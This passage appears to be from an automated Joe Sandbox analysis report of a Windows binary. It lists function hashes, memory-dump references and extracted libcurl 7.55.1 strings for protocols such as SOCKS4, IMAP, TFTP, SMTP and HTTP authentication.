                                      • String ID: $%s$--%sContent-Disposition: attachment$--%s--$--%s--$Content-Type: %s$Content-Type: multipart/mixed; boundary=%s$%s; boundary=%s$--%s$Content-Disposition: form-data; name="$Content-Type: multipart/form-data$couldn't open file "%s"
                                      • API String ID: 0-530302859
                                      • Opcode ID: f0fe78a5b109b432ef6eae87b57558c0c21770917592a6f8c195466b02ab6343
                                      • Instruction ID: 9179319085dc403de24bb817d85f39dfd0ae4a3a6c13d68f442de36e1766d253
                                      • Opcode Fuzzy Hash: f0fe78a5b109b432ef6eae87b57558c0c21770917592a6f8c195466b02ab6343
                                      • Instruction Fuzzy Hash: 6DE17121A18E4391FF50AB6194406B9E398EF487A4FC06032EA6D47AD5EF3CE54DD3A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: strchr$free
                                      • String ID: /D:$/DEFINE:$/FIND:$/LOOKUP:$/M:$/MATCH:$CLIENT libcurl 7.55.1%sQUIT$CLIENT libcurl 7.55.1DEFINE %s %sQUIT$CLIENT libcurl 7.55.1MATCH %s %s %sQUIT$Failed sending DICT request$default$lookup word is missing
                                      • API String ID: 3578582447-1471495957
                                      • Opcode ID: ecd379b2dec898cbacf7ef2c3cf6a6f6a07d7596a954545e58b8499558358c98
                                      • Instruction ID: 271b3dcda0c78ca6068cff61a6553532063633a4ebdb90d27613bb93a6fa7b26
                                      • Opcode Fuzzy Hash: ecd379b2dec898cbacf7ef2c3cf6a6f6a07d7596a954545e58b8499558358c98
                                      • Instruction Fuzzy Hash: E1919C51A0CA4241FB11BB61A5002B9E691AF4DB90FC84131DD2D8B7D5DF2CE90AF7E8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ioctlsocket
                                      • String ID: Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.$Connection time-out$Failed to receive SOCKS4 connect request ack.$Failed to resolve "%s" for SOCKS4 connect.$Failed to send SOCKS4 connect request.$SOCKS4 communication to %s:%d$SOCKS4 connect to IPv4 %s (locally resolved)$SOCKS4 connection to %s not supported$SOCKS4 reply has wrong version, version should be 4.$SOCKS4%s request granted.$SOCKS4%s: connecting to HTTP proxy %s port %d$Too long SOCKS proxy name, can't use!$[
                                      • API String ID: 3577187118-1987675181
                                      • Opcode ID: e2668e17cfdafc0678ae7534b03781d0882e57c36e1e924088ec48b4e9b66995
                                      • Instruction ID: d49f98ac1b57795af263cd0559a0bc6d889f78d87a65991e2ec07ef9cb81f1eb
                                      • Opcode Fuzzy Hash: e2668e17cfdafc0678ae7534b03781d0882e57c36e1e924088ec48b4e9b66995
                                      • Instruction Fuzzy Hash: A7C1FA62A0C78146FB54EB15E4002B9EB61FF89794FC40132E9AD07AD9CE3CE509F7A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: strcmp
                                      • String ID: Bad tagged response$CAPABILITY$EXAMINE$EXPUNGE$FETCH$LIST$LSUB$NOOP$SEARCH$SELECT$STORE$UID$Unexpected continuation response
                                      • API String ID: 1004003707-2330916320
                                      • Opcode ID: 541f1e47ed7f61a48b12b48a7e1fc0cecb5aae0e505ebeef26026d3e8ddb641f
                                      • Instruction ID: 9339b3790e9418a93ace6b78b3864b31d7c6e1b0af5d80f2a17c16a639924fea
                                      • Opcode Fuzzy Hash: 541f1e47ed7f61a48b12b48a7e1fc0cecb5aae0e505ebeef26026d3e8ddb641f
                                      • Instruction Fuzzy Hash: BA81A061A0D34341FB60BF15D5042B9E7519F09790FC85232DABE0A2D6EE2CE549F3B8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: strtol
                                      • String ID: %s (%d)$%s (%d) %s (%d)$%s (%ld)$%s (%ld)$Malformed ACK packet, rejecting$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
                                      • API String ID: 76114499-895336422
                                      • Opcode ID: 24329aacf07bd1d84a1cfb50fd16510ce32a465471fe1df6617f4eb2384c70a9
                                      • Instruction ID: 885aa4052b9fe83f60fc6ed628b078de6fd6a91a9212062721abd40b2787efa1
                                      • Opcode Fuzzy Hash: 24329aacf07bd1d84a1cfb50fd16510ce32a465471fe1df6617f4eb2384c70a9
                                      • Instruction Fuzzy Hash: 0361A661A0C64396FF14EB15E4042B9E7A4AF48BD0FC44232E92E466D5DF3CE14DE3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: freestrtok$__swprintf_l_access_errno_mkdir_strdupmalloc
                                      • String ID: %s resides on a read-only file system.$%s%s$Cannot create directory %s because you exceeded your quota.$Error creating directory %s.$No space left on the file system that will contain the directory %s.$The directory name %s is too long.$You don't have permission to create %s.
                                      • API String ID: 234837967-1086585624
                                      • Opcode ID: 0bd26ad654f95e4d16006689a8c2a9cceb0cb8bb7eb0ef997ec9b8e1b546f735
                                      • Instruction ID: 2208d9db8eff308b61a4de5551a3744d2695470a36f1b156cc7c29b587c70982
                                      • Opcode Fuzzy Hash: 0bd26ad654f95e4d16006689a8c2a9cceb0cb8bb7eb0ef997ec9b8e1b546f735
                                      • Instruction Fuzzy Hash: 5B419121A0E74281EB16BB159454078EAA0AF5CBA0BD84271CD7D477D8DF3CE40DE3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$malloc
                                      • String ID: CURLFORM_CONTENTTYPE, "%s",$ CURLFORM_COPYCONTENTS, "%s",$ CURLFORM_COPYNAME, "%s",$ CURLFORM_END);$ CURLFORM_FILE, "%s",$ CURLFORM_FILECONTENT, "%s",$ CURLFORM_FILENAME, "%s",$CURLOPT_HTTPPOST$curl_easy_setopt(hnd, %s, post%d);$curl_formadd(&post%d, &postend,$curl_formfree(post%d);$post%d = NULL;$postend = NULL;$struct curl_httppost *post%d;$struct curl_httppost *postend;
                                      • API String ID: 2190258309-3873805648
                                      • Opcode ID: 64ffcf965254c230b91c2cb67932900c583e1025ddf45ec2f1819ea4db04fc6a
                                      • Instruction ID: 59ed2ffffb8f20c88c4801e44b54400edd10bac1710ac956fd092527c8721ead
                                      • Opcode Fuzzy Hash: 64ffcf965254c230b91c2cb67932900c583e1025ddf45ec2f1819ea4db04fc6a
                                      • Instruction Fuzzy Hash: BF617211A0864741FB51BB26A814178E790AF4DBD4FC40036D83D8B2D9EE2CE54EA3EC
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __swprintf_l
                                      • String ID: %I64d$%s%c%s%c$TFTP file name too long$blksize$netascii$octet$tftp_send_first: internal error$timeout$tsize
                                      • API String ID: 1488884202-1678188727
                                      • Opcode ID: 3c2b5f10e5b307837c352ffca8a5f65d6e41c9a2c57687f587b42ed72d151fc5
                                      • Instruction ID: f1b63b33cfb81c0c27b9865d6447ff0d0402bed449c19999d0b8a889257bfe30
                                      • Opcode Fuzzy Hash: 3c2b5f10e5b307837c352ffca8a5f65d6e41c9a2c57687f587b42ed72d151fc5
                                      • Instruction Fuzzy Hash: 3CE1E462B08A8795EF15EB25D4501B8E764FF4DB84F844132DA6E037C5DE3CE01AE3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: isspace
                                      • String ID: Authentication problem. Ignoring this.$Basic$Digest$HTTP$Ignoring duplicate digest auth header.$NTLM$NTLM auth restarted$NTLM handshake failure (internal error)$NTLM handshake rejected$Negotiate$WDigest
                                      • API String ID: 3785662208-2823367978
                                      • Opcode ID: a2776838ef191d488698e1113e167f6e7cf0d4bacb73377f98718ee2b4dd774a
                                      • Instruction ID: add97fc508e0179ccf739c7fd173712e785b413ee43950fa601d11dd8ce0c866
                                      • Opcode Fuzzy Hash: a2776838ef191d488698e1113e167f6e7cf0d4bacb73377f98718ee2b4dd774a
                                      • Instruction Fuzzy Hash: D7F1C461A0C68295FB14EF21E8453B9E7A0FF49B90F844132CE6D472D5DF2CE409E7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$strpbrk
                                      • String ID: CRAM-MD5$DIGEST-MD5$EXTERNAL$GSSAPI$Kerberos$LOGIN$NTLM$OAUTHBEARER$PLAIN$WDigest$XOAUTH2$\/@
                                      • API String ID: 1876339070-1955273572
                                      • Opcode ID: 627142d0ac5b4b03070fa733e8a7e04b4f36d76eab5a5aaa639ad483ae21a84e
                                      • Instruction ID: 3206c9aa169f56c5273ee6f09fb7cc5e7c691489140b64ef206684818218983b
                                      • Opcode Fuzzy Hash: 627142d0ac5b4b03070fa733e8a7e04b4f36d76eab5a5aaa639ad483ae21a84e
                                      • Instruction Fuzzy Hash: 7AF18F72A0DA869AEB14DB60E4543A9F7A4FF08758F880172CE6D037D4CF39E458D7A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$fclosefgetsfopen
                                      • String ID: $%s%s%s$HOME$_netrc$default$login$machine$password
                                      • API String ID: 1690894011-828792305
                                      • Opcode ID: f345a6cb1b4f44c348019cb4d8307a7200c9c064f7db40b26f7390055e19fab3
                                      • Instruction ID: 37b5cfb4239e4a0ff6ae69051dac919dabde6713f414506a810671ab9b322d50
                                      • Opcode Fuzzy Hash: f345a6cb1b4f44c348019cb4d8307a7200c9c064f7db40b26f7390055e19fab3
                                      • Instruction Fuzzy Hash: EBA18E11E0DA4285FB21BB22E810379E290AF9CB95F880131DD6E477D5DE3CE549F3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __swprintf_l$ErrorLastsend
                                      • String ID: #$%127[^,],%127s$%c%c$%c%c%c%c$%c%c%c%c%s%c%c$%c%s%c%s$Sending data failed (%d)
                                      • API String ID: 716699274-931584821
                                      • Opcode ID: accfacfbed0691bd31916b5ea100c71bd05bde07445c8d7c96d950cd383fc81f
                                      • Instruction ID: bf77e1e15f3fec876895752a943cd01338b3873bef217bb88cc79a93b61f1895
                                      • Opcode Fuzzy Hash: accfacfbed0691bd31916b5ea100c71bd05bde07445c8d7c96d950cd383fc81f
                                      • Instruction Fuzzy Hash: 5A81C43261868695E710AF21E4447EAF7A0FF49798F840232EA6D07BD5CF3CD149E7A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _time64free
                                      • String ID: HTTP/%1d.%1d%c%3d$ HTTP/2 %d$Content-Length:$HTTP 1.0, assume close after body$Last-Modified:$Location:$Lying server, not serving HTTP/2$Proxy-authenticate:$Set-Cookie:$WWW-Authenticate:
                                      • API String ID: 4146837529-1502833421
                                      • Opcode ID: f770d3bb0f5fe69c0237501cabe2252e00aa6915996c321f3f1ce669ecdd3814
                                      • Instruction ID: 58ba9cb429a0f0287d6703a9a7fc3400cd2223b5463684a3ad7a9df40da5f6e3
                                      • Opcode Fuzzy Hash: f770d3bb0f5fe69c0237501cabe2252e00aa6915996c321f3f1ce669ecdd3814
                                      • Instruction Fuzzy Hash: F1F19531A0878A86EB64EB21D4406B9E7A0FF09790F844135CB7D836D1DF3CE459E7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __stdio_common_vsscanffreestrtoll
                                      • String ID: HTTP %3d$ HTTP/%1d.%1d%c%3d$ HTTP/2 %d$ RTSP/%d.%d %3d$Content-Length:$Content-Type:$HTTP 1.0, assume close after body$Lying server, not serving HTTP/2$Maximum file size exceeded$Negative content-length: %I64d, closing after transfer$Unsupported HTTP version in response
                                      • API String ID: 393391272-2638250612
                                      • Opcode ID: 0bc6d93b9c256044bd23605a67b9d2c13bf6b6d666b92c6c2dcfae6e40dc1a53
                                      • Instruction ID: 85cb3255e49f2f3c0ae763a6339a438dab600d7d8799b484e03569f3407d3422
                                      • Opcode Fuzzy Hash: 0bc6d93b9c256044bd23605a67b9d2c13bf6b6d666b92c6c2dcfae6e40dc1a53
                                      • Instruction Fuzzy Hash: 78F1A432A0868A86EB54AF24D5406B9F7A0FF09780F844131CB6D836D5DF3CE459E7B9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$_cwprintf_s_l
                                      • String ID: %I64d$<%s>$MAIL FROM:%s$MAIL FROM:%s AUTH=%s$MAIL FROM:%s AUTH=%s SIZE=%s$MAIL FROM:%s SIZE=%s
                                      • API String ID: 2020354070-658513215
                                      • Opcode ID: fb0ea872ed6b106fcfbfe2da83298d7f441b5d03f24d44e456eb95fd13d1b78c
                                      • Instruction ID: ecae7c112cf73b06682d7c063a381211960309dc18c006e92d207eda1c7c8acc
                                      • Opcode Fuzzy Hash: fb0ea872ed6b106fcfbfe2da83298d7f441b5d03f24d44e456eb95fd13d1b78c
                                      • Instruction Fuzzy Hash: 33513B21A0DA9691FB64FB16F950678E760BF5CB80FC84035D92E462D1DE3CE44DA3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D4087B
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D408C3
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D408E0
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D40924
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D4095B
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D40970
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D40985
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D409FD
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D40A12
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D40A27
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D40B2C
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D40B41
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D40B56
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$malloc
                                      • String ID: %s/%s$DIGEST-MD5 handshake failure (empty challenge message)$WDigest
                                      • API String ID: 2190258309-3361356676
                                      • Opcode ID: e1415b4fae2aebf1a358e3320af16f1c61da821f3030c15ecb8a85b33fc05d46
                                      • Instruction ID: 55b128973eece69638844cb947f08456a92dd3f8c62be1d4da14c481ddf8ca77
                                      • Opcode Fuzzy Hash: e1415b4fae2aebf1a358e3320af16f1c61da821f3030c15ecb8a85b33fc05d46
                                      • Instruction Fuzzy Hash: 24C13B25A0CB4686EB50AF66F8501A9E7A4FF4CB94F880032DE5E577A4DF3CD408D798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID: RSA Public Key (%lu bits)$%lu$RSA Public Key$dh(g)$dh(p)$dh(pub_key)$dhpublicnumber$dsa$dsa(g)$dsa(p)$dsa(pub_key)$dsa(q)$rsa(e)$rsa(n)$rsaEncryption
                                      • API String ID: 1294909896-1220118048
                                      • Opcode ID: dcf43be8042818968ab8e6fdab6af4e1b97ddff25a6de256c822809f1ac30582
                                      • Instruction ID: 4b91be060b728393328879838f5ab2f4998c6482cc02a1f0f87f6627b7ad13ed
                                      • Opcode Fuzzy Hash: dcf43be8042818968ab8e6fdab6af4e1b97ddff25a6de256c822809f1ac30582
                                      • Instruction Fuzzy Hash: AD712F61A0CA5690FB14AB61E9401FCE360AF08BC4BC84077DD2E576C5DF38E549E3E8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
